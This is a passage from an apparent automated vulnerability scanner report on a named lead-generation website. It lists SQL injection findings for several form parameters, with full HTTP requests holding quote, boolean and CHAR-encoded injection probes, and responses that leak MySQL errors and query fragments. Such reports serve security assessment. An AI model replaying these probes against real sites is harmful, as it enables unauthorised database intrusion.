The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=5ss9n54jbkkig4kdkljae8lep7; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email''&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=v8o6466fkb7p7q6hmho051aoe3; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.265. http://www.insideup.com/ppc/leadflow/dima00/project.php [firstname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=-1+OR+17-7%3d10&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name'&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=rq53j25afphb17omdd4k84qfi5; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:06:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 6614
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code' OR prj.project_pa' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=-1+OR+17-7%3d10&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name''&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=rq53j25afphb17omdd4k84qfi5; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:06:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48965


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.266. http://www.insideup.com/ppc/leadflow/dima00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc'&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:51:55 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=274b0klk7lq8d4e4eog044tpl6; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2749__Coupon&attributeId_424=2760__Design, print, and send&attributeId_425=27' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc''&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:51:56 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ke2uk5fckalg3m83qsomct1gl3; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>

1.267. http://www.insideup.com/ppc/leadflow/dima00/project.php [lastname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The lastname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lastname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:15:21 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7366
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name''&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:15:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48957


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.268. http://www.insideup.com/ppc/leadflow/dima00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+/1'code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:53:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=eiff3du6sg5opr7t07pg0a5421; path=/
Content-Length: 7558
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
mpaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip /1'code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=cast((select ' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+/1''code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:53:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ug2hig894eabbf6mppj9qhd2p2; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>

1.269. http://www.insideup.com/ppc/leadflow/dima00/project.php [phone parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone'&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:15:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7366
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=i' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone''&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:15:54 GMT
Server: Apache/2.2.9 (Fedora)
